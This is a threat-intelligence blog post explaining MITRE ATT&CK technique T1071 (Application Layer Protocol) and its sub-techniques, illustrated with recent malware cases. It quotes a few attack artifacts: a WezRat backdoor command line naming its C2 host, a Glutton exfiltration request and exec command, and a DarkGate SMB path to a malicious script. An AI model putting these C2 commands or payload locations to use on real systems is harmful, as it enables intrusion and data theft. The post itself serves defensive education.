.svg)
.svg)
LAST UPDATED ON FEBRUARY 6, 2025
The Open System Interconnection (OSI) model is the conceptual framework used to understand and standardize the functions of networking. The OSI model is divided into seven layers, each responsible for specific tasks related to data communication between devices on a network. The topmost layer in the OSI model is the Application Layer, and the protocols that live in this layer are called Application Layer Protocols. These protocols define the rules that ensure the interoperability and compatibility of diverse software applications across different platforms and networks. Adversaries exploit the Application Layer Protocols to stealthily infiltrate systems, exfiltrate data, and maintain persistent access by blending with legitimate traffic.
In this blog, we explain the T1071 Application Layer Protocol technique of the MITRE ATT&CK® framework and how adversaries employ its sub-techniques in attack campaigns in detail.
|
The Red Report 2025
|
Adversary Use of Application Layer Protocol
Application Layer Protocols, when leveraged by cyber adversaries, continue to provide a sophisticated means of conducting operations discreetly, seamlessly blending malicious activities with legitimate network traffic to evade detection. This tactic leverages the ubiquity and inherent trust of widely used protocols, embedding malicious commands and data within routine communication to obscure their intent.
Adversaries increasingly choose protocols based on their prevalence and perceived innocuity in specific environments. Protocols associated with web browsing, file transfers, email communications, and DNS queries remain prime targets due to their omnipresence in modern networks. The traffic generated by these protocols is so routine that malicious activity often hides in plain sight.
Within corporate or high-security network segments, attackers exploit protocols commonly used for internal communications, such as HTTP/S, WebSocket, SMB, FTP, FTPS, DNS, SMTP, IMAP, POP3, MQTT, XMPP, and AMQP [1]. These protocols are essential for remote access, file sharing, and inter-application communication. Manipulating these trusted channels allows adversaries to achieve their objectives, including issuing commands to compromised systems, exfiltrating data, and moving laterally across networks, all while maintaining a low profile.
Sub-techniques of T1071 Application Layer Protocol
There are 5 sub-techniques under the Application Layer Protocol technique in ATT&CK v16:
|
ID |
Name |
|
T1071.001 |
Web Protocols |
|
T1071.002 |
File Transfer Protocol |
|
T1071.003 |
Mail Protocols |
|
T1071.004 |
DNS |
|
T1071.005 |
Publish/Subscribe Protocols |
Each of these sub-techniques will be explained in the next sections.
T1071.001 Web Protocols
Adversaries exploit HTTP, HTTPS, and WebSocket protocols for Command-and-Control (C2) operations due to their widespread use and ability to blend seamlessly with legitimate web traffic. HTTP/S allows compromised systems to fetch instructions or exfiltrate data, with HTTPS encryption further obscuring malicious content from security tools. WebSocket enhances this by providing a persistent, full-duplex communication channel for real-time data transfer and command execution, reducing the overhead of repeated requests. Together, these protocols enable adversaries to evade detection, leveraging trusted web traffic to conceal their operations and bypass traditional security controls.
For instance, reported in November 2024, the WezRat malware establishes its Command and Control (C2) communication using HTTPS as part of its infection chain. After the phishing email tricks the victim into visiting the malicious lookalike site (il-cert[.]net), they are prompted to download a fake Google Chrome Installer.msi. This MSI file not only delivers a legitimate Chrome installer but also drops and executes a malicious backdoor, Updater.exe, with C2 server arguments [2].
|
"C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765 |
The backdoor uses the HTTPS protocol to communicate securely with the C2 server located at connect.il-cert[.]net. This communication involves sending system information, receiving encrypted commands, and exfiltrating stolen data. By leveraging HTTPS, WezRat ensures that its traffic remains encrypted, allowing it to evade detection by security tools that rely on inspecting plain network traffic. The encryption masks malicious activity as legitimate web traffic, further complicating identification and blocking.
In the case of Glutton malware, discovered in December 2024, HTTP is central to its modular attack framework [3]. The malware periodically polls a C2 server using standard HTTP GET or POST requests to fetch updated commands or additional payloads. Once downloaded, these payloads are executed to enable file operations, collect system information, or inject code into frameworks like Laravel and ThinkPHP.
Notably, Glutton does not encrypt its C2 traffic, relying on clear-text HTTP to deliver task instructions and new modules. The malware mimics legitimate web traffic by embedding commands within HTTP headers or responses and using periodic polling to avoid detection.
For example, in the following HTTP POST request, the malware exfiltrates collected data, such as stolen files or credentials, to the C2 server:
|
POST /data/upload HTTP/1.1 |
In response, the C2 server can deliver commands to the malware, such as:
|
{"command":"exec","payload":"ls -al"} |
This demonstrates HTTP's technical versatility for enabling discreet, modular, and persistent C2 operations.
In another case, between August and October 2024, the RevC2 backdoor was identified, utilizing WebSockets—a protocol that operates over HTTP/S—for C2 communication [4]. At a technical level, RevC2 adopts WebSocket for its communication channel, which is an extension of HTTP but allows for full-duplex, real-time communication between the malware (acting as a client) and the C2 server. The initial WebSocket connection begins with an HTTP-based handshake: the malware sends an HTTP request to the C2 server containing an Upgrade header, signaling the intention to establish a WebSocket connection. Once the server responds with a 101 Switching Protocols status, the connection upgrades from HTTP to WebSocket, enabling continuous two-way communication without the overhead of repeatedly establishing new HTTP connections.
WebSocket's nature gives RevC2 a significant advantage for stealth and efficiency. Unlike conventional HTTP, where each command requires a separate request and response, WebSocket maintains a persistent connection, allowing the malware to send and receive data seamlessly over a single channel. This avoids frequent connection attempts that might raise suspicions. Additionally, WebSocket traffic is indistinguishable from legitimate web traffic in many environments because it uses the same ports as HTTP (port 80) or HTTPS (port 443) and often leverages encrypted WebSocket Secure (WSS) communication. This makes deep-packet inspection tools less effective at detecting malicious activity.
T1071.002 File Transfer Protocols
Adversaries exploit file transfer protocols like SMB, FTP, FTPS, and TFTP for malicious activities by blending their communications with regular network traffic, making detection difficult. These protocols inherently contain numerous fields and headers, which can be manipulated to conceal malicious commands and data. This method is particularly effective for command and control operations, allowing attackers to discreetly maintain communication with compromised systems. They can also use these protocols to transfer malware or exfiltrate data, all while appearing as regular file transfer traffic.
For example, in the March-April 2024 DarkGate malware campaign, adversaries exploited the SMB protocol to discreetly transfer malicious payloads and scripts [5].
Malicious Microsoft Excel files embedded objects that, when triggered, fetched VBScript (.vbs) or JavaScript (.js) files directly from public-facing SMB shares, such as:
|
\\167[.]99[.]115[.]33\share\EXCEL_OPEN_DOCUMENT[.]vbs |
These scripts executed commands to download and run follow-up PowerShell scripts, which retrieved additional malware components like obfuscated shellcode (test.txt) and AutoHotKey-based executables from SMB or HTTP locations. By leveraging SMB, a protocol trusted for legitimate file-sharing operations, DarkGate blended malicious file transfers with normal network traffic, reducing detection risk.
The staged, modular approach facilitated stealthy deployment and execution of its payloads, while the reliance on publicly accessible SMB shares minimized direct communication with traditional C2 servers, ensuring persistence and evasion of network monitoring tools.
On the other hand, reported in the April 2024 LemonDuck malware campaign, adversaries leveraged the SMB protocol to covertly transfer malicious files and maintain persistence [6]. Using the EternalBlue vulnerability (CVE-2017-0144), the attacker gained initial access and created a hidden administrative share on the C: drive, enabling remote file transfers without detection.
Malicious executables, such as msInstall.exe and its renamed versions (FdQn.exe, HbxbVCnn.exe), were transferred and executed through SMB, blending with normal file-sharing activities. The attacker utilized SMB to deploy scripts and batch files (p.bat) to facilitate scheduled tasks, modify network configurations, and download additional payloads, ensuring continuous malware execution.
By exploiting SMB for file transfer and execution, LemonDuck discreetly moved payloads across systems while avoiding detection, demonstrating the protocol's effectiveness for covert communication and malware delivery in adversarial operations.
T1071.003 Mail Protocols
Adversaries increasingly target email protocols such as SMTP, IMAP, and POP3 for C2 communications. These protocols, integral to the sending and receiving of emails, are exploited to relay commands to compromised systems and exfiltrate sensitive data discreetly. The attackers often use email attachments or hijack legitimate email accounts, including self-registered or compromised ones, to conduct their operations. This tactic allows them to blend in with regular email traffic, avoiding detection.
For instance, the Snake malware analyzed in 2024, also known as Snake Keylogger, utilizes this technique by exploiting the SMTP protocol to exfiltrate stolen data and establish command-and-control (C2) communications [7]. The malware targets email clients like Microsoft Outlook, extracting credentials for protocols such as IMAP, POP3, and SMTP from the Windows Registry. Using pre-configured SMTP server details, including hardcoded hostnames, ports, and credentials, Snake sends stolen information, such as keystrokes, screenshots, and clipboard data, in plaintext or encrypted formats. This exfiltration can occur via two approaches: embedding the data directly in the email body or attaching it as files. By leveraging widely used mail protocols, Snake blends its malicious activity with legitimate email traffic, making it harder to detect and analyze within compromised systems.
Another example comes from a Trojan identified by security researchers in February 2024, named Trojan.Win32.Injuke.mlrx* [8]. This malware leverages the T1071.003 Mail Protocols technique for command and control. Designed for electronic espionage, the Trojan is capable of intercepting keyboard inputs, capturing screenshots, and retrieving active application lists. The stolen information is exfiltrated to cybercriminals through multiple channels, including email, demonstrating its use of mail protocols to evade detection.
|
MD5*: 6282B733288D6BF23318AB2AF8580D8F |
T1071.004 DNS
Attackers leverage DNS for more than tunneling, employing techniques such as DNS-over-HTTPS (DoH) for encrypted exchanges, DNS dribbling for slow and stealthy communication, and encoding data in DNS traffic to blend malicious activity with normal network behavior. These methods enable adversaries to evade traditional security measures while maintaining reliable and covert communication channels.
For instance, reported in April 2024, the MadMxShell backdoor exploits the DNS protocol for covert C2 communication by embedding encoded data within DNS MX queries and responses [9]. Using a custom 36-character lookup table, binary data is converted into alphanumeric subdomain strings. To bypass DNS size constraints, each DNS packet is limited to 103 bytes, with larger messages split across sequential packets, ensuring compliance with DNS protocol limits. The backdoor operates with rapid three-second intervals between transmissions, generating noisier traffic than HTTP-based malware. Requests and responses use structured messages encoded in subdomains, where subdomain blocks are separated by periods. This approach enables the malware to mimic legitimate DNS activity, blending in with normal traffic while evading detection.
In another case identified in December 2024, researchers discovered that GammaLoad malware leverages sophisticated DNS-based techniques to obfuscate and maintain its C2 communication [10]. The malware employs DNS-over-HTTPS to resolve C2 infrastructure, ensuring encrypted and stealthy communication when traditional DNS resolution methods are blocked or fail. Additionally, it implements a DNS fast-fluxing technique, dynamically rotating DNS records for its C2 servers to evade tracking and disruption.
These methods enable the malware to maintain consistent and covert communication with its C2 infrastructure, bypassing conventional network security measures designed to detect and block malicious traffic.
T1071.005 Publish/Subscribe Protocols
Adversaries exploit publish/subscribe protocols like MQTT, XMPP, and AMQP to establish covert communication channels with compromised systems. By embedding malicious commands or data into legitimate-looking protocol traffic, they leverage the centralized broker to route messages to their targets while evading detection. These protocols allow attackers to blend their activities with normal traffic, complicating efforts to distinguish malicious behavior. The asynchronous and scalable nature of these protocols further aids adversaries in maintaining persistent C2 operations across multiple systems, often bypassing traditional network monitoring and security controls.
For instance, reported in December 2024, IOCONTROL is a sophisticated malware targeting critical infrastructure, including IoT and OT devices like IP cameras, routers, PLCs, and HMIs [11]. It utilizes the MQTT protocol over port 8883 for encrypted C2 communications, embedding unique device IDs into MQTT credentials for precise control. Additionally, it employs DNS over HTTPS to resolve C2 domains, evading network traffic monitoring tools.
On the other hand, WailingCrab is a multi-component malware distributed via phishing emails with malicious attachments. Since mid-2023, its backdoor component has communicated with its C2 server using the MQTT protocol [12]. By leveraging a legitimate third-party broker, broker.emqx[.]io, WailingCrab conceals the true address of its C2 server, enhancing its stealth. This approach allows the malware's C2 communications to blend with legitimate IoT traffic, complicating detection efforts. These cases illustrate how threat actors exploit publish/subscribe protocols to establish covert and resilient C2 channels, often integrating seamlessly with legitimate network traffic to evade detection.
References
[1] “Application Layer Protocol.” Available: https://attack.mitre.org/techniques/T1071/. [Accessed: Feb. 06, 2025]
[2] “Malware Spotlight: A Deep-Dive Analysis of WezRat,” Check Point Research, Nov. 14, 2024. Available: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/. [Accessed: Dec. 17, 2024]
[3] The Hacker News, “New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP,” The Hacker News, Dec. 16, 2024. Available: https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html. [Accessed: Dec. 17, 2024]
[4] I. V. A. Muhammed, “Unveiling RevC2 and Venom Loader,” Dec. 02, 2024. Available: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader. [Accessed: Dec. 17, 2024]
[5] V. Thothathri, Y. Sui, A. Maurya, U. P. Singh, and B. Duncan, “DarkGate: Dancing the Samba With Alluring Excel Files,” Unit 42, Jul. 10, 2024. Available: https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/. [Accessed: Dec. 17, 2024]
[6] “LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits,” Oct. 04, 2024. Available: https://notes.netbytesec.com/2024/10/lemonduck-unleashes-cryptomining.html. [Accessed: Dec. 17, 2024]
[7] M. Ezat, “Deep Analysis of Snake,” ZW01f, Jun. 30, 2024. Available: https://zw01f.github.io/malware%20analysis/snake/. [Accessed: Dec. 17, 2024]
[8] “Trojan.Win32.Injuke.mlrx.” Available: https://threats.kaspersky.com/en/threat/Trojan.Win32.Injuke.mlrx/. [Accessed: Dec. 17, 2024]
[9] R. Tay and S. Singh, “Malvertising campaign targeting IT teams with MadMxShell,” Apr. 17, 2024. Available: https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell. [Accessed: Dec. 18, 2024]
[10] The Hacker News, “Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware,” The Hacker News, Dec. 06, 2024. Available: https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html. [Accessed: Dec. 18, 2024]
[11] B. Toulas, “New IOCONTROL malware used in critical infrastructure attacks,” BleepingComputer, Dec. 12, 2024. Available: https://www.bleepingcomputer.com/news/security/new-iocontrol-malware-used-in-critical-infrastructure-attacks/. [Accessed: Dec. 18, 2024]
[12] C. Hammond, O. Villadsen, and K. Metrick, “Stealthy WailingCrab Malware misuses MQTT Messaging Protocol,” Security Intelligence, Nov. 21, 2023. Available: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/. [Accessed: Dec. 18, 2024]
Share this:
